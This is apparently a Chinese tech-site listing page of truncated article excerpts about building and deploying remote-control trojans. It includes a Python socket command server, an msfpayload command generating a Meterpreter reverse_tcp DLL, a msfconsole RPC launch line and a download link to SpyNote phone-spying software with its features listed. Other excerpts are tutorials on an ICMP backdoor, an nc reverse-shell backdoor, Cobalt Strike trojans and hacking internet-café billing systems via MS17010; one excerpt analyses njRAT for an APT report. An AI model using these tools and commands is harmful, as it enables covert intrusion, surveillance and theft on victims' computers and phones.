首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
python木马远控控制端
2024-10-22
远程控制(远控Bin)
一.概念 控制端:运行在攻击者的电脑中,负责控制其他肉鸡: 被控制端:需要去生成,运行在肉鸡上,木马病毒 二.使用远控Bin工具实现内网远程控制 Step1:打开Kill.exe,点击系统设置,修改监听端口为9999,设置通讯密码: Step2:打开./Plugins/hfs2_3b287/hfs.exe,将虚拟文件目录中的东西全部移除: Step3:右键添加文件,将Consys21.dll添加进去:点击在浏览器中访问. Step4:将Consys21.dll的地址复制,打开kill.exe的服
Python简易远控(单线程版)
1. 技术:管道通信,流文件处理,socket基础 2. Tips: 默认IP:127.0.0.1 默认端口:7676 3. 代码样例: 服务端: #!/usr/bin/env python # encoding: utf-8 import socket import sys from os import * reload(sys) sys.setdefaultencoding("utf-8") def socketInit(): s = socket.socket(socket.AF
python构造远控
server端: import socket import subprocess server=socket.socket() server.bind(('127.0.0.1',4444)) server.listen(5) while True: conn,addr=server.accept() print("new conn:",addr) while True: print(addr) data=conn.recv(1024) print(len(data)) print(da
python+msf 制作 windows远控
最近分析的一个远控,后发现是meterpreter rever http shell,文件是个打包的python(打包成exe),感谢wstone的指导~ 创建dll ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 -t dll X > /tmp/sc.dll python main.py import sys, os import shutil import time import ctyp
HackingTeam重磅炸弹: 估值超1000万美金带有军火交易性质的木马病毒以及远控源代码泄露
[简单介绍] 经常使用网名: 猪头三 出生日期: 1981.XX.XX 个人站点: http://www.x86asm.com QQ交流: 643439947 编程生涯: 2001年~至今[共14年] 职业生涯: 12年 开发语言: C/C++.80x86ASM.PHP.Perl.Objective-C.Object Pascal.C#.Python 开发工具: Visual Studio.Delphi.XCode.Eclipse 技能种类: 逆向 驱动 磁盘 文件 研发领域: Windows应
【逆向&编程实战】Metasploit中的安卓载荷凭什么吊打SpyNote成为安卓端最强远控
文章作者:MG1937 QQ:3496925334 CNBLOG:ALDYS4 未经许可,禁止转载 前言 说起SpyNote大家自然不陌生,这款恶意远控软件被利用在各种攻击场景中 甚至是最近也捕获到了利用"新冠病毒"进行传播的SpyNote样本 方便的Gui操作页面,行云流水的攻击过程... 但它真有那么优秀以至于无懈可击吗? 著名渗透测试框架Metasploit中的安卓载荷和它相比到底如何呢? 文章目录 SpyNote运行流程分析 Payload加载流程比对 APK注入流程比对 灵活
Python解决网吧收费系统,远控网吧电脑设备!
python破解网吧收费系统,远控网吧电脑设备! 很多人学习python,不知道从何学起.很多人学习python,掌握了基本语法过后,不知道在哪里寻找案例上手.很多已经做案例的人,却不知道如何去学习更加高深的知识.那么针对这三类人,我给大家提供一个好的学习平台,免费领取视频教程,电子书籍,以及课程的源代码!QQ群:1097524789 我今天呢 , 我就没事跟着朋友喝酒喝酒啊.喝了很多啊.晚上到旁边的酒店开了一个房间,到了酒店才十点! 感觉没啥事情干的,那就去网吧走走看吧,看到是一个嘟嘟牛的,和
python破解网吧收费系统,远控网吧电脑设备!
我今天呢 , 我就没事跟着朋友喝酒喝酒啊.喝了很多啊.晚上到旁边的酒店开了一个房间,到了酒店才十点! 感觉没啥事情干的,那就去网吧走走看把,看到是一个嘟嘟牛的,和上次是一样的.还是照常用MS17010 扫描一波.发现一台Xp 没啥用的,后面进去看了下,发现还真的没啥用的东西 那么就继续扫描呗,嘟嘟牛是那个 asp+mysql 架构那么就扫描一下mysql端口 上啊D吧 发现没有.那么就扫一下3308 发现竟然在3308 上去看看.尝试一下默认密码.我看看嘟嘟牛的版本 那么弄一个exp呗 数据
Python3实现ICMP远控后门(上)
这几天一直在研究远控木马的一些通信协议,比如TCP,UDP,ICMP,DNS,HTTP等等,对于TCP,UDP这两种就不讲解了,因为太常见了. 大家可能对采用ICMP,DNS的木马不是很熟悉,其实这两种协议在木马通信上很流行,特点是比较隐蔽,不容易被封锁.HTTP协议主要是用在以大型网站作为C&C服务器的场景,例如之前就有使用twitter作为 C&C服务器. 本次就以ICMP协议进行分析,并使用Python开发出一个ICMP远控后门,在写这篇文章的之前,我感觉大家对ICMP协议肯定不会很
Python3实现ICMP远控后门(中)之“嗅探”黑科技
ICMP后门 前言 第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 在上两篇文章中,详细讲解了ICMP协议,同时实现了一个具备完整功能的ping工具,完整的代码发布在https://github.com/qiyeboy/LuLunZi/blob/master/NetWork/ping.py中.本次讲的是嗅探,为什么要讲嗅探呢?和ICMP后门有什么关系呢?本篇的干货有点多... 第一节 ICMP后门结构 设计的ICMP后门采用的是典型的C
Python3实现ICMP远控后门(下)之“Boss”出场
ICMP后门 前言 第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 第三篇:Python3实现ICMP远控后门(中)之"嗅探"黑科技 熬到最后一篇了,本系列的Boss要出场了,实现了一个有意思的ICMP后门,暂时使用pyinstaller打包成了一个win32和64版本,如下图所示. 在前几篇的基础上,本篇扩展的知识点为数据的加密和解密,以及shell的调用,并最终生成一个可用的ICMP后门.本篇总共分为五节,需要花费5分钟时
远控项目(Windows Socket)
实现内容(屏幕,鼠标,键盘实时控制) 控制端: #pragma once #ifndef keybd_H #define keybd_H #include <stdio.h> #include <stdlib.h> int KeyBD(int tch) { && tch < ) { return tch;//A~Z大写 } && tch < ) { return tch;//0~9数字 } && tch < ) {
用nc+简单bat/vbs脚本+winrar制作迷你远控后门
前言 某大佬某天和我聊起了nc,并且提到了nc正反向shell这个概念. 我对nc之前的了解程度仅局限于:可以侦听TCP/UDP端口,发起对应的连接. 真正的远控还没实践过,所以决定写个小后门试一试. 1.NC.正向Shell.反向Shell介绍 1.1 什么是nc: nc是netcat的简写,就是一个简单.可靠的网络工具.当然因为某些奇怪原因,已经被各大杀毒轮番轰炸.原因就和下文所述有关. 1.2 nc的作用: (1)实现任意TCP/UDP端口的侦听,nc可以作为服务器端以TCP或UDP方式侦
手机远控SpyNote教程+软件
链接:https://pan.baidu.com/s/1q0VVSxK0DCJk2VnOg5RgOA 提取码:1okp 生成一个小马界面.可以看到,和以往的远控一样,做好端口映射,定制图标,包名,版本号等等,还可以和别的apk文件捆绑, 点击imei,弹出一个对话框.点击[tool p] 即可. 然后等一段时间,电脑桌面上你会看见这个界面. 1.可以生成一个APK,绑定在被控手机的任何APP上2.可在电脑端控制手机,包括浏览.传输.删除文件等6.麦克风监听7.GPS定位8.APP管理
使用kali生成远控payload
kali linux中的metasploit框架是优秀的渗透框架之一,今天记载一下使用kali生成windows远控木马的过程 生成payload使用的工具是MSFVenom,我们输入msfvenom之后会显示出它的基本参数 在这里我们没有设置参数,所以第一行出现了一个错误 这里我们主要讲windows下payloads的生成和利用,在第五行里面我们看到已经给出了一个生成payload的例子,这个例子生成的就是windwos下的木马 即: Example: /usr/bin/msfvenom -
基于gRPC编写golang简单C2远控
概述 构建一个简单的远控木马需要编写三个独立的部分:植入程序.服务端程序和管理程序. 植入程序是运行在目标机器上的远控木马的一部分.植入程序会定期轮询服务器以查找新的命令,然后将命令输出发回给服务器. 管理程序是运行在用户机器上的客户端,用于发出实际的命令. 服务端则负责与植入程序和客户端的交互,接收客户端的指令,并在植入程序请求时,将命令发送给植入程序,随后将植入程序发送来的结果传递给客户端. gRPC 这里通过gRPC构建所有的网络交互. 关于gRPC.Protobuf.protoc请参考h
cobaltstrike进行局域网远控
用cobaltstrike进行局域网远控 cobalt strike(简称CS)是一款团队作战渗透测试神器,分为客户端及服务端,一个服务端可以对应多个客户端,一个客户端可以连接多个服务端. 实验原理:用cobaltstrike生成木马,发送到目标主机上,双击运行后反向链接到cobaltstrike监听的端口,实现远程控制 本次实验的cobaltstrike安装在kali中 点开文件 3.按住shift,右击黑色区域,点击"在终端打开",sudo su,进入超级管理员权限 4.首先给文件
Python3实现ICMP远控后门(上)_补充篇
ICMP后门(上)补充篇 前言 在上一篇文章Python3实现ICMP远控后门(上)中,我简要讲解了ICMP协议,以及实现了一个简单的ping功能,在文章发表之后,后台很多朋友留言,说对校验和的计算不是很了解,实现的ping功能仅实现了发送,接收没有实现,一个完整ping如何实现等等.本来对于ICMP后门写三篇文章的,但是对大家的疑惑临时开辟了一个补充篇,对ICMP协议校验方式,以及实现一个完整功能的ping给大家进行详细的讲解. 第一节 ICMP协议校验和 对于校验和的计算,我对写校验和的代码
拍拍熊(APT-C-37),诱导方式、DNS、安卓远控
诱导方式 1.含有正常APP功能的伪装 2.文件图标伪装 RAR 1.Android DroidJack SpyNote Windows njRAT njRAT[2]又称Bladabindi,通过控制端可以操作受控端的注册表,进程,文件等,还可以对被控端的键盘进行记录.同时njRAT采用了插件机制,可以通过不同的插件来扩展njRAT的功能. 该组织在使用njRAT时大多不是直接使用,而是在njRAT的基础上进行了二次封装,使用C#为njRAT加了一层壳,并对壳的代码进行了大量的混淆.该壳的作用是
利用kage把msf变成可视化远控平台
项目下载https://github.com/WayzDev/Kage/releases 这里用kali系统演示 1,先下载kage: 2,右击给予执行权限 3,启动msf msfconsole -q -x 'load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msfuser Pass=msfpass' 注意:如果kage跟msf不在一个机器上,上面命令如果不带serverhost参数,则只容许127.0.0.1链接我们也那么可以通过 msf
热门专题
.netcore 小程序支付 V3
编译原理预测分析过程例题
java 基本数据类型的深拷贝
关于Git五种文件状态
openstack hostname 为啥 是小写
javascript 四舍六入 逢五奇进偶舍
DruidDataSource 导致cpu上升
r语言提取日期中的年份生成一列
ubuntu定时备份mysql的最佳实践
oracle 异步IO
01分数规划牛顿迭代
vbif语句else if
qt统计函数执行时间
vb.net读取excel
php 获取 GET 参数
Puppeteer 改变 element 时间组件方法
lamp搭建kodbox
traceroute 在线工具
jmeter使用adesutil进行返回报文解密
delphi 加解密 每次加密的字符串怎么都不一样